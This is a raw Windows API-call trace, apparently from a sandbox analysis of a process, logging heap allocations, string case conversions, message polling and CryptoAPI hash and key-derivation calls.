RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.155] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.155] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.155] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.156] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0199.156] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.156] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0199.156] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.156] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.156] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.157] CryptCreateHash (in: hProv=0xad6480, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0199.157] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.158] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.158] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.158] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.159] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0199.159] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.159] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0199.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.160] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.160] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.160] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.160] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.160] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.160] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.161] CryptHashData (hHash=0xaa5660, pbData=0x24b10b8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0199.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0199.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0199.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0199.161] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0199.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.162] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.162] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.162] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.162] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0199.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0199.163] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.163] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.163] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0199.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0199.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0199.163] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0199.163] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0199.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0199.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.163] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0199.163] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.163] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0199.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0199.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.164] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.164] CryptDeriveKey (in: hProv=0xad6480, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0199.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 